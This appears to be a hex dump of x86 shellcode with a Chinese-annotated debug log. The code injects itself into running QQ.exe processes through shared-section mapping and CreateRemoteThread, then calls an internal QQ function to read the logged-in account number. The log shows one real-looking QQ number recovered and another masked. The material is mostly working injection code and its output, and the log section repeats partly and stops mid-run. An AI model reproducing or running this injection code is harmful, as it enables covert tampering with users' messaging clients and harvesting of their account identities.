24 08 B9 FF FF FF FF 33 C0 F2 AE F7 D1 49 8B C1 5F C2 04 00 C7 85 74 FE FF FF 00 10 00 00 60 E8
5C 00 00 00 4D 79 49 41 54 3A 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 09 09 09 28
49 4E 56 41 4C 49 44 5F 48 41 4E 44 4C 45 5F 56 41 4C 55 45 2C 4E 55 4C 4C 2C 50 41 47 45 5F 45
58 45 43 55 54 45 5F 52 45 41 44 57 52 49 54 45 2C 30 2C 31 30 32 34 2A 34 2C 4E 55 4C 4C 29 00
FF 55 00 61 6A 00 68 00 10 00 00 6A 00 6A 40 6A 00 6A FF FF 55 E8 89 85 80 FE FF FF 60 E8 1F 00
00 00 4D 79 49 41 54 3A 47 65 74 43 75 72 72 65 6E 74 50 72 6F 63 65 73 73 49 64 09 09 09 28 29
00 FF 55 00 61 FF 55 EC 60 E8 33 00 00 00 4D 79 49 41 54 3A 4F 70 65 6E 50 72 6F 63 65 73 73 09
09 09 28 50 52 4F 43 45 53 53 5F 41 4C 4C 5F 41 43 43 45 53 53 2C 46 41 4C 53 45 2C 65 61 78 29
00 FF 55 00 61 50 6A 00 68 FF 0F 1F 00 FF 55 D8 89 85 84 FE FF FF 83 A5 78 FE FF FF 00 60 E8 71
00 00 00 4D 79 49 41 54 3A 4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 09 09 09 28 68
4D 61 70 70 65 64 46 69 6C 65 2C 68 50 72 6F 63 65 73 73 32 2C 61 64 64 72 20 56 69 65 77 42 61
73 65 32 2C 30 2C 30 2C 30 2C 61 64 64 72 20 56 69 65 77 53 69 7A 65 2C 31 2C 30 2C 50 41 47 45
5F 45 58 45 43 55 54 45 5F 52 45 41 44 57 52 49 54 45 29 00 FF 55 00 61 6A 40 6A 00 6A 01 8D 85
74 FE FF FF 50 6A 00 6A 00 6A 00 8D 85 78 FE FF FF 50 FF B5 84 FE FF FF FF B5 80 FE FF FF FF 55
F8 83 F8 00 0F 82 16 05 00 00 E8 00 00 00 00 81 2C 24 CF 17 40 00 58 8D 80 05 10 40 00 89 85 70
FE FF FF 60 E8 35 00 00 00 4D 79 49 41 54 3A 52 74 6C 4D 6F 76 65 4D 65 6D 6F 72 79 09 09 09 28
56 69 65 77 42 61 73 65 32 2C 72 61 64 72 2C 69 6E 6A 65 63 74 43 6F 64 65 6C 65 6E 29 00 FF 55
00 61 68 E2 02 00 00 FF B5 70 FE FF FF FF B5 78 FE FF FF FF 55 F0 60 E8 38 00 00 00 4D 79 49 41
54 3A 43 72 65 61 74 65 54 6F 6F 6C 68 65 6C 70 33 32 53 6E 61 70 73 68 6F 74 09 09 09 28 54 48
33 32 43 53 5F 53 4E 41 50 50 52 4F 43 45 53 53 2C 30 29 00 FF 55 00 61 6A 00 6A 02 FF 55 C4 89
85 8C FE FF FF C7 85 90 FE FF FF 28 01 00 00 60 E8 2A 00 00 00 4D 79 49 41 54 3A 50 72 6F 63 65
73 73 33 32 46 69 72 73 74 09 09 09 28 68 61 6E 64 6C 65 2C 61 64 64 72 20 69 6E 66 6F 29 00 FF
55 00 61 8D 85 90 FE FF FF 50 FF B5 8C FE FF FF FF 55 C0 60 E8 31 00 00 00 4D 79 49 41 54 3A 6C
73 74 72 63 6D 70 69 41 09 09 09 28 61 64 64 72 20 69 6E 66 6F 2E 73 7A 45 78 65 46 69 6C 65 2C
22 51 51 2E 65 78 65 22 29 00 FF 55 00 61 E8 07 00 00 00 51 51 2E 65 78 65 00 8D 85 B4 FE FF FF
50 FF 55 C8 0B C0 0F 85 39 03 00 00 60 E8 30 00 00 00 4D 79 49 41 54 3A 4F 70 65 6E 50 72 6F 63
65 73 73 09 09 09 28 34 30 39 35 2C 30 2C 69 6E 66 6F 2E 74 68 33 32 50 72 6F 63 65 73 73 49 44
29 00 FF 55 00 61 FF B5 98 FE FF FF 6A 00 68 FF 0F 00 00 FF 55 D8 0B C0 0F 84 E7 02 00 00 89 85
88 FE FF FF 83 A5 7C FE FF FF 00 C7 85 74 FE FF FF 00 10 00 00 60 E8 71 00 00 00 4D 79 49 41 54
3A 4E 74 4D 61 70 56 69 65 77 4F 66 53 65 63 74 69 6F 6E 09 09 09 28 68 4D 61 70 70 65 64 46 69
6C 65 2C 68 50 72 6F 63 65 73 73 31 2C 61 64 64 72 20 56 69 65 77 42 61 73 65 31 2C 30 2C 30 2C
30 2C 61 64 64 72 20 56 69 65 77 53 69 7A 65 2C 31 2C 30 2C 50 41 47 45 5F 45 58 45 43 55 54 45
5F 52 45 41 44 57 52 49 54 45 29 00 FF 55 00 61 6A 40 6A 00 6A 01 8D 85 74 FE FF FF 50 6A 00 6A
00 6A 00 8D 85 7C FE FF FF 50 FF B5 88 FE FF FF FF B5 80 FE FF FF FF 55 F8 83 F8 00 0F 82 F0 01
00 00 60 E8 3B 00 00 00 4D 79 49 41 54 3A 43 72 65 61 74 65 52 65 6D 6F 74 65 54 68 72 65 61 64
09 09 09 28 68 50 72 6F 63 65 73 73 31 2C 30 2C 30 2C 56 69 65 77 42 61 73 65 31 2C 30 2C 30 2C
30 29 00 FF 55 00 61 6A 00 6A 00 6A 00 FF B5 7C FE FF FF 6A 00 6A 00 FF B5 88 FE FF FF FF 55 D4
0B C0 0F 84 8A 01 00 00 89 85 6C FE FF FF 60 E8 35 00 00 00 4D 79 49 41 54 3A 57 61 69 74 46 6F
72 53 69 6E 67 6C 65 4F 62 6A 65 63 74 09 09 09 28 68 52 65 6D 6F 74 65 54 68 72 65 61 64 2C 49
4E 46 49 4E 49 54 45 29 00 FF 55 00 61 6A FF FF B5 6C FE FF FF FF 55 E0 60 E8 3C 00 00 00 4D 79
49 41 54 3A 47 65 74 45 78 69 74 43 6F 64 65 54 68 72 65 61 64 09 09 09 28 68 52 65 6D 6F 74 65
54 68 72 65 61 64 2C 61 64 64 72 20 52 65 74 75 72 6E 5F 56 61 6C 75 65 29 00 FF 55 00 61 8D 85
68 FE FF FF 50 FF B5 6C FE FF FF FF 55 E4 56 8B F4 60 E8 3D 00 00 00 4D 79 49 41 54 3A 77 73 70
72 69 6E 74 66 41 09 09 09 28 61 64 64 72 20 40 51 51 55 69 64 2C 22 BB F1 C8 A1 B5 BD 51 51 BA
C5 3A 25 64 22 2C 52 65 74 75 72 6E 5F 56 61 6C 75 65 29 00 FF 55 00 61 FF B5 68 FE FF FF E8 0E
00 00 00 BB F1 C8 A1 B5 BD 51 51 BA C5 3A 25 64 00 8D 85 58 FE FF FF 50 FF 55 FC 60 E8 29 00 00
00 4D 79 49 41 54 3A 4F 75 74 70 75 74 44 65 62 75 67 53 74 72 69 6E 67 41 09 09 09 28 61 64 64
72 20 40 51 51 55 69 64 29 00 FF 55 00 61 8D 85 58 FE FF FF 50 FF 55 F4 8B E6 5E 60 E8 24 00 00
00 4D 79 49 41 54 3A 43 6C 6F 73 65 48 61 6E 64 6C 65 09 09 09 28 68 52 65 6D 6F 74 65 54 68 72
65 61 64 29 00 FF 55 00 61 FF B5 6C FE FF FF FF 55 D0 60 E8 20 00 00 00 4D 79 49 41 54 3A 43 6C
6F 73 65 48 61 6E 64 6C 65 09 09 09 28 68 50 72 6F 63 65 73 73 31 29 00 FF 55 00 61 FF B5 88 FE
FF FF FF 55 D0 60 E8 29 00 00 00 4D 79 49 41 54 3A 50 72 6F 63 65 73 73 33 32 4E 65 78 74 09 09
09 28 68 61 6E 64 6C 65 2C 61 64 64 72 20 69 6E 66 6F 29 00 FF 55 00 61 8D 85 90 FE FF FF 50 FF
B5 8C FE FF FF FF 55 CC 0B C0 0F 85 23 FC FF FF 60 E8 1D 00 00 00 4D 79 49 41 54 3A 43 6C 6F 73
65 48 61 6E 64 6C 65 09 09 09 28 68 61 6E 64 6C 65 29 00 FF 55 00 61 FF B5 8C FE FF FF FF 55 D0
60 E8 20 00 00 00 4D 79 49 41 54 3A 43 6C 6F 73 65 48 61 6E 64 6C 65 09 09 09 28 68 50 72 6F 63
65 73 73 32 29 00 FF 55 00 61 FF B5 84 FE FF FF FF 55 D0 61 C9 C3
调试输出信息,请用debugview查看:
00000004 10.53667545 [5112] Debug mode!
00000005 10.53904152 [5112] MyIAT:CreateFileMappingA (INVALID_HANDLE_VALUE,NULL,PAGE_EXECUTE_READWRITE,0,1024*4,NULL)
00000006 10.53908825 [5112] MyIAT:GetCurrentProcessId ()
00000007 10.53913784 [5112] MyIAT:OpenProcess (PROCESS_ALL_ACCESS,FALSE,eax)
00000008 10.53917313 [5112] MyIAT:NtMapViewOfSection (hMappedFile,hProcess2,addr ViewBase2,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE)
00000009 10.53923798 [5112] MyIAT:RtlMoveMemory (ViewBase2,radr,injectCodelen)
00000010 10.53926563 [5112] MyIAT:CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS,0)
00000011 10.54169750 [5112] MyIAT:Process32First (handle,addr info)
00000012 10.54172421 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000013 10.54194260 [5112] MyIAT:Process32Next (handle,addr info)
00000014 10.54199123 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000015 10.54202461 [5112] MyIAT:Process32Next (handle,addr info)
00000016 10.54206276 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000017 10.54209423 [5112] MyIAT:Process32Next (handle,addr info)
00000018 10.54213047 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000019 10.54216290 [5112] MyIAT:Process32Next (handle,addr info)
00000020 10.54220104 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000021 10.54223156 [5112] MyIAT:Process32Next (handle,addr info)
00000022 10.54226780 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000023 10.54229736 [5112] MyIAT:Process32Next (handle,addr info)
00000024 10.54233360 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000025 10.54236412 [5112] MyIAT:Process32Next (handle,addr info)
00000026 10.54240036 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000027 10.54243088 [5112] MyIAT:Process32Next (handle,addr info)
00000028 10.54246712 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000029 10.54249859 [5112] MyIAT:Process32Next (handle,addr info)
00000030 10.54253387 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000031 10.54256439 [5112] MyIAT:Process32Next (handle,addr info)
00000032 10.54260063 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000033 10.54263020 [5112] MyIAT:Process32Next (handle,addr info)
00000034 10.54266548 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000035 10.54269600 [5112] MyIAT:Process32Next (handle,addr info)
00000036 10.54273129 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000037 10.54276276 [5112] MyIAT:Process32Next (handle,addr info)
00000038 10.54279709 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000039 10.54282856 [5112] MyIAT:Process32Next (handle,addr info)
00000040 10.54286480 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000041 10.54293251 [5112] MyIAT:Process32Next (handle,addr info)
00000042 10.54296970 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000043 10.54300022 [5112] MyIAT:Process32Next (handle,addr info)
00000044 10.54304123 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000045 10.54307461 [5112] MyIAT:Process32Next (handle,addr info)
00000046 10.54310989 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000047 10.54313946 [5112] MyIAT:Process32Next (handle,addr info)
00000048 10.54317570 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000049 10.54320717 [5112] MyIAT:Process32Next (handle,addr info)
00000050 10.54324436 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000051 10.54327393 [5112] MyIAT:Process32Next (handle,addr info)
00000052 10.54330921 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000053 10.54333973 [5112] MyIAT:Process32Next (handle,addr info)
00000054 10.54337502 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000055 10.54340553 [5112] MyIAT:Process32Next (handle,addr info)
00000056 10.54344177 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000057 10.54347229 [5112] MyIAT:Process32Next (handle,addr info)
00000058 10.54350662 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000059 10.54353809 [5112] MyIAT:Process32Next (handle,addr info)
00000060 10.54357433 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000061 10.54360485 [5112] MyIAT:Process32Next (handle,addr info)
00000062 10.54364014 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000063 10.54367065 [5112] MyIAT:Process32Next (handle,addr info)
00000064 10.54370689 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000065 10.54373550 [5112] MyIAT:Process32Next (handle,addr info)
00000066 10.54377079 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000067 10.54380226 [5112] MyIAT:Process32Next (handle,addr info)
00000068 10.54383755 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000069 10.54386806 [5112] MyIAT:Process32Next (handle,addr info)
00000070 10.54390335 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000071 10.54393291 [5112] MyIAT:Process32Next (handle,addr info)
00000072 10.54396820 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000073 10.54399872 [5112] MyIAT:Process32Next (handle,addr info)
00000074 10.54427528 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000075 10.54431629 [5112] MyIAT:Process32Next (handle,addr info)
00000076 10.54435539 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000077 10.54438496 [5112] MyIAT:Process32Next (handle,addr info)
00000078 10.54442024 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000079 10.54445171 [5112] MyIAT:Process32Next (handle,addr info)
00000080 10.54448795 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000081 10.54451752 [5112] MyIAT:Process32Next (handle,addr info)
00000082 10.54455280 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000083 10.54458332 [5112] MyIAT:Process32Next (handle,addr info)
00000084 10.54461861 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000085 10.54464912 [5112] MyIAT:Process32Next (handle,addr info)
00000086 10.54468441 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000087 10.54471493 [5112] MyIAT:Process32Next (handle,addr info)
00000088 10.54475021 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000089 10.54477978 [5112] MyIAT:Process32Next (handle,addr info)
00000090 10.54481506 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000091 10.54484558 [5112] MyIAT:Process32Next (handle,addr info)
00000092 10.54488277 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000093 10.54491138 [5112] MyIAT:Process32Next (handle,addr info)
00000094 10.54494762 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000095 10.54497719 [5112] MyIAT:Process32Next (handle,addr info)
00000096 10.54501247 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000097 10.54504395 [5112] MyIAT:Process32Next (handle,addr info)
00000098 10.54507923 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000099 10.54510880 [5112] MyIAT:Process32Next (handle,addr info)
00000100 10.54514408 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000101 10.54517365 [5112] MyIAT:Process32Next (handle,addr info)
00000102 10.54521084 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000103 10.54524136 [5112] MyIAT:Process32Next (handle,addr info)
00000104 10.54527664 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000105 10.54530716 [5112] MyIAT:Process32Next (handle,addr info)
00000106 10.54534245 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000107 10.54537201 [5112] MyIAT:Process32Next (handle,addr info)
00000108 10.54540825 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000109 10.54543972 [5112] MyIAT:Process32Next (handle,addr info)
00000110 10.54547501 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000111 10.54550457 [5112] MyIAT:Process32Next (handle,addr info)
00000112 10.54554081 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000113 10.54557037 [5112] MyIAT:Process32Next (handle,addr info)
00000114 10.54560471 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000115 10.54563618 [5112] MyIAT:Process32Next (handle,addr info)
00000116 10.54567146 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000117 10.54570198 [5112] MyIAT:Process32Next (handle,addr info)
00000118 10.54573727 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000119 10.54576683 [5112] MyIAT:Process32Next (handle,addr info)
00000120 10.54580212 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000121 10.54583263 [5112] MyIAT:Process32Next (handle,addr info)
00000122 10.54586792 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000123 10.54589844 [5112] MyIAT:Process32Next (handle,addr info)
00000124 10.54593468 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000125 10.54596519 [5112] MyIAT:Process32Next (handle,addr info)
00000126 10.54600143 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000127 10.54603195 [5112] MyIAT:Process32Next (handle,addr info)
00000128 10.54607105 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000129 10.54610252 [5112] MyIAT:Process32Next (handle,addr info)
00000130 10.54613876 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000131 10.54617119 [5112] MyIAT:OpenProcess (4095,0,info.th32ProcessID)
00000132 10.54664135 [5112] MyIAT:NtMapViewOfSection (hMappedFile,hProcess1,addr ViewBase1,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE)
00000133 10.54668427 [5112] MyIAT:CreateRemoteThread (hProcess1,0,0,ViewBase1,0,0,0)
00000134 10.54684258 [5112] MyIAT:WaitForSingleObject (hRemoteThread,INFINITE)
00000135 10.54902363 [5216] Debug mode!
00000136 10.54912949 [5216] injectIAT:GetModuleHandleA ("KernelUtil.dll")
00000137 10.54917145 [5216] injectIAT:GetProcAddress (eax,"?GetSelfUin@Contact@Util@@YAKXZ")
00000138 10.54944611 [5112] MyIAT:GetExitCodeThread (hRemoteThread,addr Return_Value)
00000139 10.54951668 [5112] MyIAT:wsprintfA (addr @QQUid,"获取到QQ号:%d",Return_Value)
00000140 10.54955769 [5112] MyIAT:OutputDebugStringA (addr @QQUid)
00000141 10.54959297 [5112] 获取到QQ号:1067968022
00000142 10.54962349 [5112] MyIAT:CloseHandle (hRemoteThread)
00000143 10.54966354 [5112] MyIAT:CloseHandle (hProcess1)
00000144 10.54969597 [5112] MyIAT:Process32Next (handle,addr info)
00000145 10.54974365 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000146 10.54979992 [5112] MyIAT:OpenProcess (4095,0,info.th32ProcessID)
00000147 10.54984188 [5112] MyIAT:NtMapViewOfSection (hMappedFile,hProcess1,addr ViewBase1,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE)
00000148 10.54989052 [5112] MyIAT:CreateRemoteThread (hProcess1,0,0,ViewBase1,0,0,0)
00000149 10.55005360 [5112] MyIAT:WaitForSingleObject (hRemoteThread,INFINITE)
00000150 10.55031776 [5988] Debug mode!
00000151 10.55035591 [5988] injectIAT:GetModuleHandleA ("KernelUtil.dll")
00000152 10.55038071 [5988] injectIAT:GetProcAddress (eax,"?GetSelfUin@Contact@Util@@YAKXZ")
00000153 10.55056095 [5112] MyIAT:GetExitCodeThread (hRemoteThread,addr Return_Value)
00000154 10.55061531 [5112] MyIAT:wsprintfA (addr @QQUid,"获取到QQ号:%d",Return_Value)
00000155 10.55064774 [5112] MyIAT:OutputDebugStringA (addr @QQUid)
00000156 10.55067635 [5112] 获取到QQ号:xxxxxx隐藏
00000157 10.55070591 [5112] MyIAT:CloseHandle (hRemoteThread)
00000158 10.55073643 [5112] MyIAT:CloseHandle (hProcess1)
00000159 10.55076599 [5112] MyIAT:Process32Next (handle,addr info)
00000160 10.55080891 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000161 10.55084229 [5112] MyIAT:Process32Next (handle,addr info)
00000162 10.55088806 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000163 10.55091858 [5112] MyIAT:Process32Next (handle,addr info)
00000164 10.55095577 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000165 10.55098629 [5112] MyIAT:Process32Next (handle,addr info)
00000166 10.55102444 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000167 10.55105495 [5112] MyIAT:Process32Next (handle,addr info)
00000168 10.55109310 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000169 10.55112267 [5112] MyIAT:Process32Next (handle,addr info)
00000170 10.55116081 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000171 10.55119133 [5112] MyIAT:Process32Next (handle,addr info)
00000172 10.55123043 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000173 10.55125999 [5112] MyIAT:Process32Next (handle,addr info)
00000174 10.55129528 [5112] MyIAT:CloseHandle (handle)
00000175 10.55133057 [5112] MyIAT:CloseHandle (hProcess2)
00000005 10.53904152 [5112] MyIAT:CreateFileMappingA (INVALID_HANDLE_VALUE,NULL,PAGE_EXECUTE_READWRITE,0,1024*4,NULL)
00000006 10.53908825 [5112] MyIAT:GetCurrentProcessId ()
00000007 10.53913784 [5112] MyIAT:OpenProcess (PROCESS_ALL_ACCESS,FALSE,eax)
00000008 10.53917313 [5112] MyIAT:NtMapViewOfSection (hMappedFile,hProcess2,addr ViewBase2,0,0,0,addr ViewSize,1,0,PAGE_EXECUTE_READWRITE)
00000009 10.53923798 [5112] MyIAT:RtlMoveMemory (ViewBase2,radr,injectCodelen)
00000010 10.53926563 [5112] MyIAT:CreateToolhelp32Snapshot (TH32CS_SNAPPROCESS,0)
00000011 10.54169750 [5112] MyIAT:Process32First (handle,addr info)
00000012 10.54172421 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000013 10.54194260 [5112] MyIAT:Process32Next (handle,addr info)
00000014 10.54199123 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000015 10.54202461 [5112] MyIAT:Process32Next (handle,addr info)
00000016 10.54206276 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000017 10.54209423 [5112] MyIAT:Process32Next (handle,addr info)
00000018 10.54213047 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000019 10.54216290 [5112] MyIAT:Process32Next (handle,addr info)
00000020 10.54220104 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000021 10.54223156 [5112] MyIAT:Process32Next (handle,addr info)
00000022 10.54226780 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000023 10.54229736 [5112] MyIAT:Process32Next (handle,addr info)
00000024 10.54233360 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000025 10.54236412 [5112] MyIAT:Process32Next (handle,addr info)
00000026 10.54240036 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000027 10.54243088 [5112] MyIAT:Process32Next (handle,addr info)
00000028 10.54246712 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000029 10.54249859 [5112] MyIAT:Process32Next (handle,addr info)
00000030 10.54253387 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000031 10.54256439 [5112] MyIAT:Process32Next (handle,addr info)
00000032 10.54260063 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000033 10.54263020 [5112] MyIAT:Process32Next (handle,addr info)
00000034 10.54266548 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000035 10.54269600 [5112] MyIAT:Process32Next (handle,addr info)
00000036 10.54273129 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000037 10.54276276 [5112] MyIAT:Process32Next (handle,addr info)
00000038 10.54279709 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000039 10.54282856 [5112] MyIAT:Process32Next (handle,addr info)
00000040 10.54286480 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000041 10.54293251 [5112] MyIAT:Process32Next (handle,addr info)
00000042 10.54296970 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000043 10.54300022 [5112] MyIAT:Process32Next (handle,addr info)
00000044 10.54304123 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000045 10.54307461 [5112] MyIAT:Process32Next (handle,addr info)
00000046 10.54310989 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000047 10.54313946 [5112] MyIAT:Process32Next (handle,addr info)
00000048 10.54317570 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000049 10.54320717 [5112] MyIAT:Process32Next (handle,addr info)
00000050 10.54324436 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000051 10.54327393 [5112] MyIAT:Process32Next (handle,addr info)
00000052 10.54330921 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000053 10.54333973 [5112] MyIAT:Process32Next (handle,addr info)
00000054 10.54337502 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000055 10.54340553 [5112] MyIAT:Process32Next (handle,addr info)
00000056 10.54344177 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000057 10.54347229 [5112] MyIAT:Process32Next (handle,addr info)
00000058 10.54350662 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000059 10.54353809 [5112] MyIAT:Process32Next (handle,addr info)
00000060 10.54357433 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000061 10.54360485 [5112] MyIAT:Process32Next (handle,addr info)
00000062 10.54364014 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000063 10.54367065 [5112] MyIAT:Process32Next (handle,addr info)
00000064 10.54370689 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000065 10.54373550 [5112] MyIAT:Process32Next (handle,addr info)
00000066 10.54377079 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000067 10.54380226 [5112] MyIAT:Process32Next (handle,addr info)
00000068 10.54383755 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000069 10.54386806 [5112] MyIAT:Process32Next (handle,addr info)
00000070 10.54390335 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000071 10.54393291 [5112] MyIAT:Process32Next (handle,addr info)
00000072 10.54396820 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000073 10.54399872 [5112] MyIAT:Process32Next (handle,addr info)
00000074 10.54427528 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000075 10.54431629 [5112] MyIAT:Process32Next (handle,addr info)
00000076 10.54435539 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000077 10.54438496 [5112] MyIAT:Process32Next (handle,addr info)
00000078 10.54442024 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000079 10.54445171 [5112] MyIAT:Process32Next (handle,addr info)
00000080 10.54448795 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000081 10.54451752 [5112] MyIAT:Process32Next (handle,addr info)
00000082 10.54455280 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000083 10.54458332 [5112] MyIAT:Process32Next (handle,addr info)
00000084 10.54461861 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000085 10.54464912 [5112] MyIAT:Process32Next (handle,addr info)
00000086 10.54468441 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000087 10.54471493 [5112] MyIAT:Process32Next (handle,addr info)
00000088 10.54475021 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
00000089 10.54477978 [5112] MyIAT:Process32Next (handle,addr info)
00000090 10.54481506 [5112] MyIAT:lstrcmpiA (addr info.szExeFile,"QQ.exe")
